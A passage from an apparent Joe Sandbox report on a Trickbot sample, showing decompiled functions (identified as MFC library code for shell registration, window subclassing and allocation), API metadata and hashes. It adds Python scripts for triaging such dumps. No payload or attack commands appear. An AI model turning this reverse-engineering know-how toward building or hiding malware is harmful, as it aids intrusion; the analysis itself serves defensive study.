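    On NT the high word is the build number.  On Win9x/Win32s bit 31 is set
    and the high word also carries platform bits, so the build is reported
    as 0 rather than guessed.
    """
    major = dw & 0xFF
    minor = (dw >> 8) & 0xFF
    is_win9x = bool(dw & 0x80000000)
    build = 0 if is_win9x else (dw >> 16) & 0xFFFF
    return major, minor, build, is_win9x


def afx_flags(getversion_dw: int, getprocessversion_dw: int = 0) -> AfxVersionData:
    """Reproduce the six stores of E00432740 for the given API return values.

    GetProcessVersion(0) is consulted only when major >= 4, which is the
    `if(_t19 != 0)` branch in the listing.
    """
    major, minor, _build, is_win9x = decode_getversion(getversion_dw)
    win4 = major >= 4
    marked4 = win4 and getprocessversion_dw >= 0x00040000
    return AfxVersionData(
        win_ver=(major << 8) | minor,
        is_win9x=is_win9x,
        win4_or_later=win4,
        not_win4=not win4,
        sm_caption=win4,
        marked4=marked4,
    )


if __name__ == "__main__":
    # Constructed inputs: a Windows 7 SP1 GetVersion() value (6.1, build 7601)
    # and a 4.0 subsystem version from GetProcessVersion(0).
    print(decode_getversion(0x1DB10106))
    print(afx_flags(0x1DB10106, 0x00040000))
```

Feeding the Windows 7 value gives win_ver 0x0601 with every "Win4" flag set, which is the only outcome possible on any OS the sandbox runs; none of these globals influence what the sample does later, so they can be skipped when hunting for the payload's real decision points.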

                          C-Code - Quality: 100%
                          			E00409A06() {
                          				_Unknown_base(*)()* _t1;
                          
                          				_t1 = SetUnhandledExceptionFilter(E004099C0); // executed
                          				 *0x44b950 = _t1;
                          				return _t1;
                          			}




                          0x00409a0b
                          0x00409a11
                          0x00409a16

                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(Function_000099C0), ref: 00409A0B
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: 8ad94d2ad42983138bf53cacd1314b51b83cc3874294e77523f7ae6984331b77
                          • Instruction ID: fd76e86587670657feed25afd086b1f7d2776c4e965921a1bf4a8f8e34d2658b
                          • Opcode Fuzzy Hash: 8ad94d2ad42983138bf53cacd1314b51b83cc3874294e77523f7ae6984331b77
                          • Instruction Fuzzy Hash: A1A022F8082202CBCF002F30AC0C2003F20F202302B00803FE800A03A0CBF00800CA0C
                          Uniqueness Score: -1.00%

                          Control-flow Graph (image not captured; legend: Executed / Not Executed)
                          Entry block 433712-433755 (call 405340, call 432562, call 41da3f). API-bearing blocks: 4337aa-4337cf ExtractIconA; 4337d1-4337ec DestroyIcon; 433a41-433a73 call 4181f7, RegQueryValueA, call 418246. The remaining blocks are string formatting and registry comparison helpers (call 4155cc, call 4333da, call 4181a3, call 417fb5) and the cleanup chain 433ac7-433b21 (call 417ec8 x7) and 433b28-433b4c (call 417ec8 x2).
                          C-Code - Quality: 87%
                          			E00433712(void* __ecx, void* __edi) {
                          				void* __esi;
                          				char* _t131;
                          				intOrPtr* _t135;
                          				void* _t137;
                          				char* _t146;
                          				intOrPtr _t164;
                          				char* _t171;
                          				long _t174;
                          				intOrPtr _t190;
                          				intOrPtr _t193;
                          				char* _t204;
                          				struct HICON__* _t207;
                          				void* _t242;
                          				intOrPtr* _t258;
                          				void* _t261;
                          				struct HICON__* _t263;
                          				char* _t264;
                          				char* _t265;
                          				void* _t268;
                          				void* _t269;
                          				void* _t271;
                          				void* _t272;
                          
                          				E00405340(E00438910, _t269);
                          				_t272 = _t271 - 0x34;
                          				_t131 =  *0x447478; // 0x44748c
                          				_t261 = __ecx;
                          				 *(_t269 - 0x30) = _t131;
                          				 *(_t269 - 0x14) = _t131;
                          				 *(_t269 - 4) = 0;
                          				 *(_t269 - 4) = 1;
                          				E0041DA3F(_t261,  *(E00432562() + 8), _t269 - 0x30); // executed
                          				_t135 =  *((intOrPtr*)(_t261 + 8));
                          				 *(_t269 - 0x38) = 1;
                          				if(_t135 == 0) {
                          					L40:
                          					 *(_t269 - 4) = 0;
                          					E00417EC8(_t269 - 0x14);
                          					 *(_t269 - 4) =  *(_t269 - 4) | 0xffffffff;
                          					_t137 = E00417EC8(_t269 - 0x30);
                          					 *[fs:0x0] =  *((intOrPtr*)(_t269 - 0xc));
                          					return _t137;
                          				}
                          				while(1) {
                          					_t258 =  *((intOrPtr*)(_t135 + 8));
                          					 *((intOrPtr*)(_t269 - 0x3c)) =  *_t135;
                          					E00417C3D(_t269 - 0x1c, _t269 - 0x30);
                          					 *(_t269 - 4) = 2;
                          					E00417C3D(_t269 - 0x28, _t269 - 0x30);
                          					 *(_t269 - 4) = 3;
                          					E00417C3D(_t269 - 0x24, _t269 - 0x30);
                          					 *(_t269 - 4) = 4;
                          					E00417C3D(_t269 - 0x2c, _t269 - 0x30);
                          					if( *((intOrPtr*)(_t269 + 8)) != 0) {
                          						_t204 =  *0x447478; // 0x44748c
                          						 *(_t269 - 0x34) = _t204;
                          						 *(_t269 - 4) = 6;
                          						_t207 = ExtractIconA( *(E00432562() + 8),  *(_t269 - 0x30),  *(_t269 - 0x38)); // executed
                          						_t263 = _t207;
                          						if(_t263 == 0) {
                          							E004155CC(_t269 - 0x34, ",%d", 0);
                          							_t272 = _t272 + 0xc;
                          						} else {
                          							E004155CC(_t269 - 0x34, ",%d",  *(_t269 - 0x38));
                          							_t272 = _t272 + 0xc;
                          							DestroyIcon(_t263);
                          						}
                          						E004181DF(_t269 - 0x2c, _t269 - 0x34);
                          						 *(_t269 - 4) = 5;
                          						E00417EC8(_t269 - 0x34);
                          					}
                          					_t146 =  *0x447478; // 0x44748c
                          					 *(_t269 - 0x18) = _t146;
                          					 *(_t269 - 0x10) = _t146;
                          					 *(_t269 - 0x20) = _t146;
                          					_push(5);
                          					_push(_t269 - 0x10);
                          					 *(_t269 - 4) = 9;
                          					if( *((intOrPtr*)( *_t258 + 0x64))() == 0 ||  *((intOrPtr*)( *(_t269 - 0x10) - 8)) == 0) {
                          						goto L38;
                          					}
                          					_push(6);
                          					_push(_t269 - 0x20);
                          					if( *((intOrPtr*)( *_t258 + 0x64))() == 0) {
                          						E00417FB5(_t269 - 0x20, _t269, _t269 - 0x10);
                          					}
                          					if(E004333DA( *(_t269 - 0x10),  *(_t269 - 0x20), 0) != 0) {
                          						if( *((intOrPtr*)(_t269 + 8)) == 0) {
                          							L15:
                          							_push(0);
                          							_push(_t269 - 0x14);
                          							if( *((intOrPtr*)( *_t258 + 0x64))() == 0 ||  *((intOrPtr*)( *(_t269 - 0x14) - 8)) == 0) {
                          								_t264 = "ddeexec";
                          								_push(_t264);
                          								E004155CC(_t269 - 0x14, "%s\\shell\\open\\%s",  *(_t269 - 0x10));
                          								_t272 = _t272 + 0x10;
                          								_t164 = E004333DA( *(_t269 - 0x14), "[open(\"%1\")]", 0);
                          								__eflags = _t164;
                          								if(_t164 == 0) {
                          									goto L38;
                          								}
                          								__eflags =  *((intOrPtr*)(_t269 + 8));
                          								if( *((intOrPtr*)(_t269 + 8)) == 0) {
                          									_push(" \"%1\"");
                          									_t242 = _t269 - 0x1c;
                          									goto L26;
                          								}
                          								_push(_t264);
                          								E004155CC(_t269 - 0x14, "%s\\shell\\print\\%s",  *(_t269 - 0x10));
                          								_t272 = _t272 + 0x10;
                          								_t190 = E004333DA( *(_t269 - 0x14), "[print(\"%1\")]", 0);
                          								__eflags = _t190;
                          								if(_t190 == 0) {
                          									goto L38;
                          								}
                          								_push(_t264);
                          								E004155CC(_t269 - 0x14, "%s\\shell\\printto\\%s",  *(_t269 - 0x10));
                          								_t272 = _t272 + 0x10;
                          								_t193 = E004333DA( *(_t269 - 0x14), "[printto(\"%1\",\"%2\",\"%3\",\"%4\")]", 0);
                          								__eflags = _t193;
                          								if(_t193 == 0) {
                          									goto L38;
                          								}
                          								_t268 = " /dde";
                          								E004181A3(_t269 - 0x1c, _t268);
                          								E004181A3(_t269 - 0x28, _t268);
                          								_push(_t268);
                          								goto L24;
                          							} else {
                          								E004181A3(_t269 - 0x1c, " \"%1\"");
                          								if( *((intOrPtr*)(_t269 + 8)) == 0) {
                          									L27:
                          									_t265 = "command";
                          									_push(_t265);
                          									E004155CC(_t269 - 0x14, "%s\\shell\\open\\%s",  *(_t269 - 0x10));
                          									_t272 = _t272 + 0x10;
                          									if(E004333DA( *(_t269 - 0x14),  *((intOrPtr*)(_t269 - 0x1c)), 0) == 0) {
                          										goto L38;
                          									}
                          									if( *((intOrPtr*)(_t269 + 8)) == 0) {
                          										L31:
                          										 *((intOrPtr*)( *_t258 + 0x64))(_t269 - 0x18, 4);
                          										_t171 =  *(_t269 - 0x18);
                          										_t290 =  *((intOrPtr*)(_t171 - 8));
                          										if( *((intOrPtr*)(_t171 - 8)) == 0) {
                          											goto L38;
                          										}
                          										 *(_t269 - 0x40) = 0x208;
                          										_t174 = RegQueryValueA(0x80000000, _t171, E004181F7(_t269 - 0x14, _t269, 0x208), _t269 - 0x40);
                          										E00418246(_t269 - 0x14, _t290, 0xffffffff);
                          										if(_t174 != 0) {
                          											L35:
                          											if(E004333DA( *(_t269 - 0x18),  *(_t269 - 0x10), 0) != 0 &&  *((intOrPtr*)(_t269 + 8)) != 0) {
                          												E004155CC(_t269 - 0x14, "%s\\ShellNew",  *(_t269 - 0x18));
                          												_t272 = _t272 + 0xc;
                          												E004333DA( *(_t269 - 0x14), 0x43e0b8, "NullFile");
                          											}
                          											goto L38;
                          										}
                          										_t180 =  *(_t269 - 0x14);
                          										if( *((intOrPtr*)( *(_t269 - 0x14) - 8)) == 0 || E0040504F(_t180,  *(_t269 - 0x10)) == 0) {
                          											goto L35;
                          										} else {
                          											goto L38;
                          										}
                          									}
                          									_push(_t265);
                          									E004155CC(_t269 - 0x14, "%s\\shell\\print\\%s",  *(_t269 - 0x10));
                          									_t272 = _t272 + 0x10;
                          									if(E004333DA( *(_t269 - 0x14),  *((intOrPtr*)(_t269 - 0x28)), 0) == 0) {
                          										goto L38;
                          									}
                          									_push(_t265);
                          									E004155CC(_t269 - 0x14, "%s\\shell\\printto\\%s",  *(_t269 - 0x10));
                          									_t272 = _t272 + 0x10;
                          									if(E004333DA( *(_t269 - 0x14),  *((intOrPtr*)(_t269 - 0x24)), 0) == 0) {
                          										goto L38;
                          									}
                          									goto L31;
                          								}
                          								E004181A3(_t269 - 0x28, " /p \"%1\"");
                          								_push(" /pt \"%1\" \"%2\" \"%3\" \"%4\"");
                          								L24:
                          								_t242 = _t269 - 0x24;
                          								L26:
                          								E004181A3(_t242);
                          								goto L27;
                          							}
                          						}
                          						E004155CC(_t269 - 0x14, "%s\\DefaultIcon",  *(_t269 - 0x10));
                          						_t272 = _t272 + 0xc;
                          						if(E004333DA( *(_t269 - 0x14),  *((intOrPtr*)(_t269 - 0x2c)), 0) == 0) {
                          							goto L38;
                          						}
                          						goto L15;
                          					}
                          					L38:
                          					 *(_t269 - 4) = 8;
                          					E00417EC8(_t269 - 0x20);
                          					 *(_t269 - 4) = 7;
                          					E00417EC8(_t269 - 0x10);
                          					 *(_t269 - 4) = 5;
                          					E00417EC8(_t269 - 0x18);
                          					 *(_t269 - 4) = 4;
                          					E00417EC8(_t269 - 0x2c);
                          					 *(_t269 - 4) = 3;
                          					E00417EC8(_t269 - 0x24);
                          					 *(_t269 - 4) = 2;
                          					E00417EC8(_t269 - 0x28);
                          					 *(_t269 - 4) = 1;
                          					E00417EC8(_t269 - 0x1c);
                          					 *(_t269 - 0x38) =  *(_t269 - 0x38) + 1;
                          					if( *((intOrPtr*)(_t269 - 0x3c)) != 0) {
                          						_t135 =  *((intOrPtr*)(_t269 - 0x3c));
                          						continue;
                          					}
                          					goto L40;
                          				}
                          			}

























                          Instruction addresses (side column of the listing above, one per source line; 0x00000000 marks goto/label lines with no instruction):
                          0x00433717 0x0043371c 0x0043371f 0x00433726 0x00433728 0x0043372d 0x00433730 0x00433733 0x00433744 0x00433749
                          0x0043374c 0x00433755 0x00433b28 0x00433b2b 0x00433b2e 0x00433b33 0x00433b3a 0x00433b44 0x00433b4c 0x00433b4c
                          0x00433761 0x00433763 0x00433769 0x00433770 0x0043377c 0x00433780 0x0043378c 0x00433790 0x0043379c 0x004337a0
                          0x004337a8 0x004337aa 0x004337af 0x004337b2 0x004337c5 0x004337cb 0x004337cf 0x004337f8 0x004337fd 0x004337d1
                          0x004337dd 0x004337e2 0x004337e6 0x004337e6 0x00433807 0x0043380f 0x00433813 0x00433813 0x00433818 0x0043381d
                          0x00433820 0x00433823 0x0043382b 0x0043382d 0x00433830 0x00433839 0x00000000 0x00000000 0x00433850 0x00433852
                          0x0043385a 0x00433863 0x00433863 0x00433876 0x0043387f 0x004338a9 0x004338ae 0x004338af 0x004338b7 0x004338ee
                          0x004338f6 0x00433900 0x00433905 0x00433911 0x00433916 0x00433918 0x00000000 0x00000000 0x0043391e 0x00433921
                          0x00433996 0x0043399b 0x00000000 0x0043399b 0x00433923 0x00433930 0x00433935 0x00433941 0x00433946 0x00433948
                          0x00000000 0x00000000 0x0043394e 0x0043395b 0x00433960 0x0043396c 0x00433971 0x00433973 0x00000000 0x00000000
                          0x00433979 0x00433982 0x0043398b 0x00433990 0x00000000 0x004338c1 0x004338c9 0x004338d1 0x004339a3 0x004339a3
                          0x004339ab 0x004339b5 0x004339ba 0x004339cb 0x00000000 0x00000000 0x004339d4 0x00433a28 0x00433a32 0x00433a35
                          0x00433a38 0x00433a3b 0x00000000 0x00000000 0x00433a4c 0x00433a5f 0x00433a6c 0x00433a73 0x00433a8c 0x00433a9a
                          0x00433aad 0x00433ab2 0x00433ac2 0x00433ac2 0x00000000 0x00433a9a 0x00433a75 0x00433a7b 0x00000000 0x00000000
                          0x00000000 0x00000000 0x00433a7b 0x004339d6 0x004339e3 0x004339e8 0x004339f9 0x00000000 0x00000000 0x004339ff
                          0x00433a0c 0x00433a11 0x00433a22 0x00000000 0x00000000 0x00000000 0x00433a22 0x004338df 0x004338e4 0x00433991
                          0x00433991 0x0043399e 0x0043399e 0x00000000 0x0043399e 0x004338b7 0x0043388d 0x00433892 0x004338a3 0x00000000
                          0x00000000 0x00000000 0x004338a3 0x00433ac7 0x00433aca 0x00433ace 0x00433ad6 0x00433ada 0x00433ae2 0x00433ae6
                          0x00433aee 0x00433af2 0x00433afa 0x00433afe 0x00433b06 0x00433b0a 0x00433b12 0x00433b16 0x00433b1b 0x00433b21
                          0x0043375e 0x00000000 0x0043375e 0x00000000 0x00433b27

                          APIs
                          • __EH_prolog.LIBCMT ref: 00433717
                            • Part of subcall function 0041DA3F: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0041DA59
                            • Part of subcall function 0041DA3F: GetShortPathNameA.KERNEL32(?,00000000,00000104), ref: 0041DA71
                            • Part of subcall function 00417C3D: InterlockedIncrement.KERNEL32(?), ref: 00417C52
                          • ExtractIconA.SHELL32(?,?,00000001), ref: 004337C5
                          • DestroyIcon.USER32(00000000), ref: 004337E6
                            • Part of subcall function 00418246: lstrlenA.KERNEL32(00000000,00000100,0041C6F4,000000FF,?,00000000,000000FF,00000100,?,?,?,00000100,?,?), ref: 00418259
                          • RegQueryValueA.ADVAPI32(80000000,?,00000000,00000208), ref: 00433A5F
                          Strings (per-string address table not captured; the strings themselves are listed under String ID below)
                          Similarity
                          • API ID: IconName$DestroyExtractFileH_prologIncrementInterlockedModulePathQueryShortValuelstrlen
                          • String ID: "%1"$ /dde$ /p "%1"$ /pt "%1" "%2" "%3" "%4"$%s\DefaultIcon$%s\ShellNew$%s\shell\open\%s$%s\shell\print\%s$%s\shell\printto\%s$,%d$NullFile$[open("%1")]$[print("%1")]$[printto("%1","%2","%3","%4")]$command$ddeexec
                          • API String ID: 1041107710-4043335175
                          • Opcode ID: a8f7810314b9d161cd91ad33f6038c1514b542b5b235c2bf98f7ccbcde4e074b
                          • Instruction ID: 0e85794538d9c9c3d52b96bdff513c674c559b15789a36988b976b88e38e0e93
                          • Opcode Fuzzy Hash: a8f7810314b9d161cd91ad33f6038c1514b542b5b235c2bf98f7ccbcde4e074b
                          • Instruction Fuzzy Hash: 3FD16C71D0020AEEDF00EFA5C985AEEBBB9AF18305F14541AF504B2291DB799E44CB69
                          Uniqueness Score: -1.00%
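The executed functions shown so far are statically linked MFC runtime code rather than Trickbot's own logic: the `%s\shell\open\%s`, `ddeexec`, `command`, `DefaultIcon` and `ShellNew` strings together with the single RegQueryValueA read under HKEY_CLASSES_ROOT (0x80000000) are CDocManager::RegisterShellFileTypes, the GetVersion/LoadCursorA routine is afxData initialisation, and the `AfxOldWndProc423` window property in the E0041892F listing that follows is MFC's subclassing hook. When working through a Joe Sandbox function dump it pays to parse the per-function `APIs` and `String ID` lines, separate direct calls from `Part of subcall function` lines, and discount known library code before deciding which registry or file activity to chase. The script below is an added example (not code from the sample, from this page or from Joe Sandbox); its input is a constructed excerpt of the metadata lines shown on this page, and the MFC signature table and the watchlist of API prefixes are my own heuristics, which is an assumption rather than anything the report states.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Added example: parse the "APIs" / "String ID" metadata of Joe Sandbox function
# listings and separate library boilerplate from calls worth chasing.  The
# signature table and watchlist below are heuristics of this example.

# Constructed input: C-code headers and metadata lines of two entries on this
# page, pasted in the format the report prints them.
REPORT_EXCERPT = r"""
C-Code - Quality: 90%
E00432740() {
APIs
• GetVersion.KERNEL32(?,?,?,0043273B), ref: 004327B7
• GetProcessVersion.KERNELBASE(00000000,?,?,?,0043273B), ref: 004327F4
• LoadCursorA.USER32(00000000,00007F02), ref: 00432822
• LoadCursorA.USER32(00000000,00007F00), ref: 0043282D
• API ID: CursorLoadVersion$Process
• String ID:
C-Code - Quality: 87%
E00433712(void* __ecx, void* __edi) {
APIs
• __EH_prolog.LIBCMT ref: 00433717
  • Part of subcall function 0041DA3F: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0041DA59
  • Part of subcall function 0041DA3F: GetShortPathNameA.KERNEL32(?,00000000,00000104), ref: 0041DA71
• ExtractIconA.SHELL32(?,?,00000001), ref: 004337C5
• DestroyIcon.USER32(00000000), ref: 004337E6
• RegQueryValueA.ADVAPI32(80000000,?,00000000,00000208), ref: 00433A5F
• String ID: "%1"$ /dde$%s\DefaultIcon$%s\ShellNew$%s\shell\open\%s$%s\shell\print\%s$,%d$NullFile$[open("%1")]$command$ddeexec
"""

FUNC_RE = re.compile(r"^E([0-9A-Fa-f]{8})\([^)]*\)\s*\{$")           # "E00433712(...) {"
API_RE = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-Fa-f]{8}:\s*)?"
    r"(?P<api>[A-Za-z_][\w$]*)\.(?P<module>[A-Za-z0-9_]+)"           # Name.MODULE
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"   # (args), ref: addr
)
SUBCALL_RE = re.compile(r"Part of subcall function ([0-9A-Fa-f]{8}):")


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: Tuple[str, ...]
    ref: str               # address of the call instruction
    via: Optional[str]     # callee that actually makes the call, if indirect


def parse_entries(text: str) -> Dict[str, dict]:
    """Return {function address: {"apis": [ApiCall, ...], "strings": [str, ...]}}."""
    entries: Dict[str, dict] = {}
    cur = None
    for raw in text.splitlines():
        line = raw.strip()
        m = FUNC_RE.match(line)
        if m:
            cur = entries.setdefault(m.group(1).upper(), {"apis": [], "strings": []})
            continue
        if cur is None:
            continue
        if line.startswith("• String ID:"):
            rest = line[len("• String ID:"):]
            rest = rest[1:] if rest.startswith(" ") else rest     # one separator space
            cur["strings"] = [s for s in rest.split("$") if s]    # report joins strings with '$'
            continue
        m = API_RE.search(line)
        if m:
            sub = SUBCALL_RE.search(line)
            args = tuple(a for a in (m["args"] or "").split(",") if a)
            cur["apis"].append(ApiCall(m["api"], m["module"], args, m["ref"].upper(),
                                       sub.group(1).upper() if sub else None))
    return entries


# A function counts as library code when it makes all listed direct calls and
# carries all listed strings.  Heuristic of this example, not report output.
MFC_SIGNATURES: List[Tuple[str, set, set]] = [
    ("afxData version/cursor init", {"GetVersion", "GetProcessVersion", "LoadCursorA"}, set()),
    ("CDocManager::RegisterShellFileTypes", {"RegQueryValueA"},
     {"%s\\shell\\open\\%s", "%s\\DefaultIcon", "command", "ddeexec"}),
    ("AfxWndProc subclass hook", {"GetPropA"}, {"AfxOldWndProc423"}),
]

WATCHLIST_PREFIXES = ("RegOpenKey", "RegQueryValue", "RegSetValue", "RegCreateKey", "RegDeleteKey",
                      "CreateProcess", "WriteFile", "CreateFile", "InternetOpen", "WinHttp", "URLDownload")


def triage(text: str) -> Dict[str, dict]:
    """Per function: direct calls, indirect calls, matched library signatures, and
    watchlist calls left unexplained by any signature."""
    result: Dict[str, dict] = {}
    for func, rec in parse_entries(text).items():
        direct = [c.name for c in rec["apis"] if c.via is None]
        strings = set(rec["strings"])
        library = [label for label, apis, strs in MFC_SIGNATURES
                   if apis <= set(direct) and strs <= strings]
        watch = sorted({n for n in direct if n.startswith(WATCHLIST_PREFIXES)})
        result[func] = {
            "direct_apis": direct,
            "indirect_apis": [(c.name, c.via) for c in rec["apis"] if c.via],
            "library": library,
            "unexplained_watchlist": [] if library else watch,
        }
    return result


if __name__ == "__main__":
    for func, info in triage(REPORT_EXCERPT).items():
        print(f"E{func}: {info}")
```

Run against the excerpt, E00432740 resolves to the afxData initialiser and E00433712 to RegisterShellFileTypes, so its RegQueryValueA call drops out of the unexplained list; GetModuleFileNameA and GetShortPathNameA are kept as indirect calls through 0041DA3F rather than attributed to the function itself. A function that reaches a watchlist API with no signature match is the one to open next.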

                          Control-flow Graph (image not captured)
                          C-Code - Quality: 81%
                          			E0041892F(void* __ecx, void* __edx) {
                          				_Unknown_base(*)()* _t33;
                          				void* _t35;
                          				void* _t36;
                          				long _t40;
                          				void* _t41;
                          				void* _t44;
                          				long _t54;
                          				signed int _t58;
                          				void* _t61;
                          				void* _t66;
                          				struct HWND__* _t68;
                          				CHAR* _t71;
                          				void* _t74;
                          				void* _t75;
                          				void* _t77;
                          
                          				_t66 = __edx;
                          				_t61 = __ecx;
                          				E00405340(E004377D8, _t75);
                          				_t68 =  *(_t75 + 8);
                          				_t71 = "AfxOldWndProc423";
                          				 *((intOrPtr*)(_t75 - 0x10)) = _t77 - 0x40;
                          				_t33 = GetPropA(_t68, _t71);
                          				 *(_t75 - 0x14) =  *(_t75 - 0x14) & 0x00000000;
                          				 *(_t75 - 4) =  *(_t75 - 4) & 0x00000000;
                          				 *(_t75 - 0x18) = _t33;
                          				_t35 =  *(_t75 + 0xc) - 6;
                          				_t58 = 1;
                          				if(_t35 == 0) {
                          					_t36 = E0041884D(_t75,  *(_t75 + 0x14));
                          					E004185B5(_t61, E0041884D(_t75, _t68),  *(_t75 + 0x10), _t36);
                          					goto L9;
                          				} else {
                          					_t41 = _t35 - 0x1a;
                          					if(_t41 == 0) {
                          						_t58 = 0 | E00418616(E0041884D(_t75, _t68),  *(_t75 + 0x14),  *(_t75 + 0x14) >> 0x10) == 0x00000000;
                          						L9:
                          						if(_t58 != 0) {
                          							goto L10;
                          						}
                          					} else {
                          						_t44 = _t41 - 0x62;
                          						if(_t44 == 0) {
                          							SetWindowLongA(_t68, 0xfffffffc,  *(_t75 - 0x18));
                          							RemovePropA(_t68, _t71);
                          							GlobalDeleteAtom(GlobalFindAtomA(_t71));
                          							goto L10;
                          						} else {
                          							if(_t44 != 0x8e) {
                          								L10:
                          								_t40 = CallWindowProcA( *(_t75 - 0x18), _t68,  *(_t75 + 0xc),  *(_t75 + 0x10),  *(_t75 + 0x14)); // executed
                          								 *(_t75 - 0x14) = _t40;
                          							} else {
                          								_t74 = E0041884D(_t75, _t68);
                          								E00418519(_t74, _t75 - 0x30, _t75 - 0x1c);
                          								_t54 = CallWindowProcA( *(_t75 - 0x18), _t68, 0x110,  *(_t75 + 0x10),  *(_t75 + 0x14));
                          								_push( *((intOrPtr*)(_t75 - 0x1c)));
                          								 *(_t75 - 0x14) = _t54;
                          								_push(_t75 - 0x30);
                          								_push(_t74);
                          								E0041853C(_t66);
                          							}
                          						}
                          					}
                          				}
                          				 *[fs:0x0] =  *((intOrPtr*)(_t75 - 0xc));
                          				return  *(_t75 - 0x14);
                          			}

                          Instruction address column (shown beside each code line in the original report; the per-line alignment was lost in extraction, the addresses listed run from 0x0041892f to 0x00418a4a)

                          APIs
                          • __EH_prolog.LIBCMT ref: 00418934
                          • GetPropA.USER32(?,AfxOldWndProc423), ref: 0041894C
                          • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 004189AA
                            • Part of subcall function 0041853C: GetWindowRect.USER32(?,?), ref: 00418561
                            • Part of subcall function 0041853C: GetWindow.USER32(?,00000004), ref: 0041857E
                          • SetWindowLongA.USER32(?,000000FC,?), ref: 004189DA
                          • RemovePropA.USER32(?,AfxOldWndProc423), ref: 004189E2
                          • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 004189E9
                          • GlobalDeleteAtom.KERNEL32(00000000), ref: 004189F0
                            • Part of subcall function 00418519: GetWindowRect.USER32(?,?), ref: 00418525
                          • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 00418A44
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
                          • String ID: AfxOldWndProc423
                          • API String ID: 2397448395-1060338832
                          • Opcode ID: d2fd6f990285d39a6d87cebec84d2e2769cf57fe8e2d542f4c104503553590e1
                          • Instruction ID: def6d9af7fd9a420a759b2c8fd090f95103d8fe4d7864d47780bde64d7efd21c
                          • Opcode Fuzzy Hash: d2fd6f990285d39a6d87cebec84d2e2769cf57fe8e2d542f4c104503553590e1
                          • Instruction Fuzzy Hash: 6A313A72800119BBCB02AFA5DD49EFF7B79EF49354F00412EF901A2151CB7989919BA9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          Basic blocks, flattened from the rendered graph (block id: address range, API calls made in the block; successor blocks). The executed/not-executed colouring of the graph is not recoverable in text.
                          • 164: 0x4329e7-0x432a04, EnterCriticalSection; successors 165, 166
                          • 165: 0x432a13-0x432a18; successors 168, 169
                          • 166: 0x432a06-0x432a0d; successors 165, 167
                          • 167: 0x432acc-0x432acf; successors 170, 171
                          • 168: 0x432a35-0x432a3e; successors 173, 174
                          • 169: 0x432a1a-0x432a1d; successor 172
                          • 170: 0x432ad1-0x432ad4; successor 171
                          • 171: 0x432ad7-0x432af8, LeaveCriticalSection; no successors (function exit)
                          • 172: 0x432a20-0x432a23; successors 175, 176
                          • 173: 0x432a53-0x432a6f, GlobalHandle, GlobalUnlock, GlobalReAlloc; successor 177
                          • 174: 0x432a40-0x432a51, GlobalAlloc; successor 177
                          • 175: 0x432a25-0x432a2b; successors 172, 176
                          • 176: 0x432a2d-0x432a2f; successors 167, 168
                          • 177: 0x432a75-0x432a81; successors 178, 179
                          • 178: 0x432a83-0x432a99, GlobalHandle, GlobalLock, LeaveCriticalSection, call 0x41564b; successor 179
                          • 179: 0x432a9e-0x432acb, GlobalLock, call 0x405360; successor 167
                          C-Code - Quality: 100%
                          			E004329E7() {
                          				void* __ecx;
                          				void* __ebp;
                          				struct _CRITICAL_SECTION* _t36;
                          				void* _t37;
                          				struct _CRITICAL_SECTION* _t42;
                          				signed char* _t58;
                          				void* _t61;
                          				void* _t63;
                          				void* _t65;
                          				signed int _t70;
                          				void* _t71;
                          				intOrPtr _t72;
                          				signed int _t73;
                          				void* _t74;
                          
                          				_t71 = _t65;
                          				_t1 = _t71 + 0x1c; // 0x44b4bc
                          				_t36 = _t1;
                          				 *(_t74 + 0x14) = _t36;
                          				EnterCriticalSection(_t36);
                          				_t3 = _t71 + 4; // 0x20
                          				_t72 =  *_t3;
                          				_t4 = _t71 + 8; // 0x4
                          				_t70 =  *_t4;
                          				if(_t70 >= _t72) {
                          					L2:
                          					_t70 = 1;
                          					if(_t72 <= _t70) {
                          						L7:
                          						_t13 = _t71 + 0x10; // 0x1cbf10
                          						_t37 =  *_t13;
                          						_t73 = _t72 + 0x20;
                          						if(_t37 != 0) {
                          							_t61 = GlobalHandle(_t37);
                          							GlobalUnlock(_t61);
                          							_t42 = GlobalReAlloc(_t61, _t73 << 3, 0x2002);
                          						} else {
                          							_t42 = GlobalAlloc(0x2002, _t73 << 3); // executed
                          						}
                          						 *(_t74 + 0x10) = _t42;
                          						if(_t42 == 0) {
                          							_t15 = _t71 + 0x10; // 0x1cbf10
                          							GlobalLock(GlobalHandle( *_t15));
                          							LeaveCriticalSection( *(_t74 + 0x14));
                          							E0041564B(_t65);
                          						}
                          						_t63 = GlobalLock( *(_t74 + 0x10));
                          						_t18 = _t71 + 4; // 0x20
                          						E00405360(_t63 +  *_t18 * 8, 0,  *_t18 * 0x1fffffff + _t73 << 3);
                          						_t74 = _t74 + 0xc;
                          						 *(_t71 + 0x10) = _t63;
                          						 *(_t71 + 4) = _t73;
                          					} else {
                          						_t10 = _t71 + 0x10; // 0x1cbf10
                          						_t58 =  *_t10 + 8;
                          						while(( *_t58 & 0x00000001) != 0) {
                          							_t70 = _t70 + 1;
                          							_t58 =  &(_t58[8]);
                          							if(_t70 < _t72) {
                          								continue;
                          							}
                          							break;
                          						}
                          						if(_t70 >= _t72) {
                          							goto L7;
                          						}
